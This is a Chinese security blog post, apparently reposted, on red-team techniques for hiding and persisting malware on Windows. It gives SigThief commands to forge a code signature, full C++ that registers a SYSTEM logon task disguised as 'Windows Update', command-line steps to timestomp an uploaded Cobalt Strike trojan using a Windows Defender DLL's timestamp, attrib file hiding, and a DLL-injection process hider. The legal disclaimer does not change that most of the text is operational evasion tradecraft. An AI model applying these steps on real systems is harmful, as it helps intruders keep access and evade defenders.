2026-03-03 05:57:44 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 该文档概述了红蓝对抗中的几种进程隐藏与权限维持技术。具体包括：利用SigThief伪造签名与替换图标伪装exe程序；编写C++代码调用计划任务API实现隐蔽维权；使用工具修改文件时间戳以规避时间排查；利用attrib命令实现文件深度隐藏；以及通过DLL注入技术隐藏任务管理器中的进程。这些方法旨在提高攻击的隐蔽性与生存能力。 综合评分： 81 文章分类： 红队,渗透测试,内网渗透,免杀,实战经验

cover_image

红蓝博弈中的进程隐藏方法

原创

hyyrent hyyrent

0xSecurity

2026年2月25日 15:22 广东

1、exe伪装正常程序

https://github.com/secretsquirrel/SigThief

python sigthief.py -i 360Safe.exe -t notepad.exe -o tes.exe

-i 为签名文件
-t 为需要伪造的文件
-o 为输出文件

https://www.trustasia.com/solution/sign-tools

图标提取

https://github.com/JarlPenguin/BeCyIconGrabberPortable

图标替换

Resource hacker

2、调用计划任务API维权

使用计划任务对木马程序做好维权

// Tasksch.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include&nbsp;<iostream>
#define&nbsp;_WIN32_DCOM
#include&nbsp;<windows.h>
#include&nbsp;<iostream>
#include&nbsp;<stdio.h>
#include&nbsp;<comdef.h>
// &nbsp;引入计划任务头
#include&nbsp;<taskschd.h>
#pragma&nbsp;comment(lib, "taskschd.lib")
#pragma&nbsp;comment(lib, "comsupp.lib")

usingnamespacestd;

int__cdeclwmain()
{

&nbsp; &nbsp;&nbsp;// 初始化COM
&nbsp; &nbsp;&nbsp;HRESULThr=CoInitializeEx(NULL,&nbsp;COINIT_MULTITHREADED);
&nbsp; &nbsp;&nbsp;if&nbsp;(FAILED(hr))
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;printf("\nCoInitializeEx failed: %x",&nbsp;hr);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return1;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;// 注册安全性并设置该过程的默认安全性值。
&nbsp; &nbsp;&nbsp;hr=CoInitializeSecurity(
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;NULL,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;-1,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;NULL,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;NULL,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;RPC_C_IMP_LEVEL_IMPERSONATE,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;NULL,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;0,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;NULL);

&nbsp; &nbsp;&nbsp;LPCWSTRwszTaskName=L"Windows Update";&nbsp;//设置计划任务名称

&nbsp; &nbsp;&nbsp;//创建ITaskService的实例

&nbsp; &nbsp;&nbsp;ITaskService*pService=NULL;
&nbsp; &nbsp;&nbsp;hr=CoCreateInstance(CLSID_TaskScheduler,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;NULL,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;CLSCTX_INPROC_SERVER,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;IID_ITaskService,
&nbsp; &nbsp; &nbsp; &nbsp; (void**)&pService);

&nbsp; &nbsp;&nbsp;// 链接到任务实例
&nbsp; &nbsp;&nbsp;hr=pService->Connect(_variant_t(),&nbsp;_variant_t(),
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;_variant_t(),&nbsp;_variant_t());

&nbsp; &nbsp;&nbsp;// &nbsp; &nbsp; 获取指向根任务文件夹的指针。
&nbsp; &nbsp;&nbsp;ITaskFolder*pRootFolder=NULL;
&nbsp; &nbsp;&nbsp;hr=pService->GetFolder(_bstr_t(L"\\"),&nbsp;&pRootFolder);

&nbsp; &nbsp;&nbsp;// &nbsp;如果存在相同的任务删除该任务
&nbsp; &nbsp;&nbsp;pRootFolder->DeleteTask(_bstr_t(wszTaskName),&nbsp;0);

&nbsp; &nbsp;&nbsp;// &nbsp;创建任务生成器对象以创建任务。
&nbsp; &nbsp;&nbsp;ITaskDefinition*pTask=NULL;
&nbsp; &nbsp;&nbsp;hr=pService->NewTask(0,&nbsp;&pTask);

&nbsp; &nbsp;&nbsp;pService->Release(); &nbsp;//清理Com

&nbsp; &nbsp;&nbsp;// 获取注册信息
&nbsp; &nbsp;&nbsp;IRegistrationInfo*pRegInfo=NULL;
&nbsp; &nbsp;&nbsp;hr=pTask->get_RegistrationInfo(&pRegInfo);
&nbsp; &nbsp;&nbsp;BSTRms=SysAllocString(L"Microsoft"); &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 修改你想要改的计划任务创建者

&nbsp; &nbsp;&nbsp;// &nbsp;创建计划任务设置
&nbsp; &nbsp;&nbsp;ITaskSettings*pSettings=NULL;
&nbsp; &nbsp;&nbsp;hr=pTask->get_Settings(&pSettings);

&nbsp; &nbsp;&nbsp;// &nbsp; &nbsp; &nbsp;设置任务的设置值
&nbsp; &nbsp;&nbsp;hr=pSettings->put_StartWhenAvailable(VARIANT_TRUE);
&nbsp; &nbsp;&nbsp;pSettings->Release();

&nbsp; &nbsp;&nbsp;// &nbsp;------------------------------------------------------
&nbsp; &nbsp;&nbsp;// &nbsp;获取取触发器集合以插入登录触发器。
&nbsp; &nbsp;&nbsp;ITriggerCollection*pTriggerCollection=NULL;
&nbsp; &nbsp;&nbsp;hr=pTask->get_Triggers(&pTriggerCollection);

&nbsp; &nbsp;&nbsp;// &nbsp;添加触发器
&nbsp; &nbsp;&nbsp;ITrigger*pTrigger=NULL;
&nbsp; &nbsp;&nbsp;hr=pTriggerCollection->Create(TASK_TRIGGER_LOGON,&nbsp;&pTrigger); &nbsp;&nbsp;//TASK_TRIGGER_EVENT 事件触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_TIME &nbsp; 特定时间触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_DAILY &nbsp;每天触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_WEEKLY 每周触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_MONTHLY &nbsp;每月触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_MONTHLYDOW 按每月的星期几触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_IDLE &nbsp; 系统空闲时触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_REGISTRATION &nbsp; 注册任务时触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_BOOT &nbsp; 启动触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_LOGON &nbsp;用户登录触发
&nbsp; &nbsp;&nbsp;// TASK_TRIGGER_SESSION_STATE_CHANGE &nbsp; 会话更改时触发
&nbsp; &nbsp;&nbsp;pTriggerCollection->Release();

&nbsp; &nbsp;&nbsp;ILogonTrigger*pLogonTrigger=NULL;
&nbsp; &nbsp;&nbsp;hr=pTrigger->QueryInterface(
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;IID_ILogonTrigger, (void**)&pLogonTrigger);
&nbsp; &nbsp;&nbsp;pTrigger->Release();

&nbsp; &nbsp;&nbsp;hr=pLogonTrigger->put_Id(_bstr_t(L"Trigger1"));

&nbsp; &nbsp;&nbsp;/*
&nbsp; &nbsp;&nbsp;//设置指定触发时间 如果不设置 代表任何时间都可以触发

&nbsp; &nbsp;&nbsp;hr = pLogonTrigger->put_StartBoundary( _bstr_t(L"2020-10-30T08:00:00") );

&nbsp; &nbsp;&nbsp;hr = pLogonTrigger->put_EndBoundary( _bstr_t(L"2020-10-30T08:00:00") );
&nbsp; &nbsp;&nbsp;*/

&nbsp; &nbsp;&nbsp;/*
&nbsp; &nbsp;&nbsp;// &nbsp;定义某个用户 登录时触发 注释掉代表所有用户登录后触发

&nbsp; &nbsp;&nbsp;hr = pLogonTrigger->put_UserId( _bstr_t( L"administrator" ) ); &nbsp; //某用户登录后触发 设置某用户
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;//put_UserId &nbsp; &nbsp;获取或设置用户的标识符。 参数 BSTR user
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;//HRESULT put_UserId(
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// &nbsp;BSTR user
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;//);

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;//put_Delay &nbsp; &nbsp; &nbsp;获取或设置一个值，该值指示用户登录到开始任务之间的时间。 参数 BSTR delay
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;//HRESULT put_Delay(
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// &nbsp;BSTR delay
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;//);

&nbsp; &nbsp;&nbsp;pLogonTrigger->Release();

&nbsp; &nbsp;*/

&nbsp; &nbsp;&nbsp;IActionCollection*pActionCollection=NULL;
&nbsp; &nbsp;&nbsp;hr=pTask->get_Actions(&pActionCollection);
&nbsp; &nbsp;&nbsp;IAction*pAction=NULL;
&nbsp; &nbsp;&nbsp;hr=pActionCollection->Create(TASK_ACTION_EXEC,&nbsp;&pAction);&nbsp;//触发程序执行： TASK_ACTION_EXEC
&nbsp; &nbsp;&nbsp;IExecAction*pExecAction=NULL;
&nbsp; &nbsp;&nbsp;hr=pAction->QueryInterface(
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;IID_IExecAction, (void**)&pExecAction);

&nbsp; &nbsp;&nbsp;hr=pExecAction->put_Path(_bstr_t(L"C:\\Users\\Public\\AccountPictures\\new_msedge.exe"));
&nbsp; &nbsp;&nbsp;pExecAction->Release();
&nbsp; &nbsp;&nbsp;if&nbsp;(FAILED(hr))
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;printf(" 无法设置程序执行路径: %x",&nbsp;hr);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pRootFolder->Release();
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pTask->Release();
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;CoUninitialize();
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return1;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;IRegisteredTask*pRegisteredTask=NULL;

&nbsp; &nbsp;&nbsp;hr=pRootFolder->RegisterTaskDefinition(
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;_bstr_t(wszTaskName),
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pTask,
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;TASK_CREATE_OR_UPDATE, &nbsp;// 创建并覆盖现有的计划任务：TASK_CREATE_OR_UPDATE
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;//仅更新：TASK_UPDATE
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;//仅创建：TASK_CREATE
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;//禁用：TASK_DISABLE

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;_variant_t(L"system"), &nbsp;// 启动身份 system 或者administrator
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;_variant_t(),
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;TASK_LOGON_GROUP,&nbsp;//登录技术 &nbsp;组激活：TASK_LOGON_GROUP 用户登录后激活：TASK_LOGON_INTERACTIVE_TOKEN
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;_variant_t(L""),
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&pRegisteredTask);

&nbsp; &nbsp;&nbsp;if&nbsp;(FAILED(hr))
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;printf("\n无法保存计划任务 : %x",&nbsp;hr);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pRootFolder->Release();
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pTask->Release();
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;CoUninitialize();
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return1;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;printf("Success！ 成功注册计划任务 ");

&nbsp; &nbsp;&nbsp;// Clean up
&nbsp; &nbsp;&nbsp;pRootFolder->Release();
&nbsp; &nbsp;&nbsp;pTask->Release();
&nbsp; &nbsp;&nbsp;pRegisteredTask->Release();
&nbsp; &nbsp;&nbsp;CoUninitialize();
&nbsp; &nbsp;&nbsp;return0;
}

https://github.com/0x727/SchTask_0x727

SchTask.exe de.exe 1

运行后会自动迁移程序至C:\Users\HAHA\AppData\Roaming\Microsoft\Windows\Themes

C:\Users\HAHA\AppData\Roaming\Microsoft\Windows\Themes\fontdrvhost.exe
C:\Windows\System32\Tasks\Microsoft\Windows\UPnP\fontdrvhost
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UPnP\fontdrvhost

3、修改文件时间

当我们上传cs木马至服务器的时候，由于修改日期是新的，蓝队人员很容易通过 everything 筛选时间排查出

这时候我们就需要使用一些技巧进行隐藏

https://github.com/MsF-NTDLL/ChTimeStamp

通过这个项目实现修改文件时间，先看看预览效果

net3.5安装

查看net版本
shell reg query "HKLM\Software\Microsoft\NET Framework Setup\NDP" /s /v version | findstr /i version | sort /+26 /r
需要安装net3.5 没有安装一下
shell dism.exe /online /enable-feature /featurename:netfx3 /Source:C:\Users\hack\Desktop\dotnetfx35.exe
DISM /Online /Enable-Feature /All /FeatureName:NetFx3 /LimitAccess /Source:D:\sources\sxs

https://github.com/MsF-NTDLL/ChTimeStamp

shell copy "C:\Program Files\Windows Defender\MpClient.dll" C:\Users\Public\AccountPictures\MpClient.dll
shell C:\Users\Public\AccountPictures\ChTimeStamp.exe C:\Users\Public\AccountPictures\new_msedge.exe C:\Users\Public\AccountPictures\MpClient.dll

https://github.com/sorabug/ChangeTimestamp

ChangeTimestamp.exe xxx.exe 2021-12-09 15:08:27

4、深度隐藏exe

在目录下选择查看隐藏文件仍无法查看

attrib +s +h +r xxx.exe
attrib -s -h -r C:\Users\Public\sbqs.exe

处理前

处理后

5、任务管理器进程隐藏

https://github.com/Pizz33/Go_Processhider

效果展示

技术细节

进程枚举: 使用CreateToolhelp32Snapshot和Process32First/Next枚举系统进程
DLL注入: 通过VirtualAllocEx、WriteProcessMemory和CreateRemoteThread实现远程DLL注入
内存映射: 使用CreateFileMappingA和MapViewOfFile实现进程间通信
API调用: 直接调用Windows Native API实现底层操作

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：0xSecurity hyyrent hyyrent《红蓝博弈中的进程隐藏方法》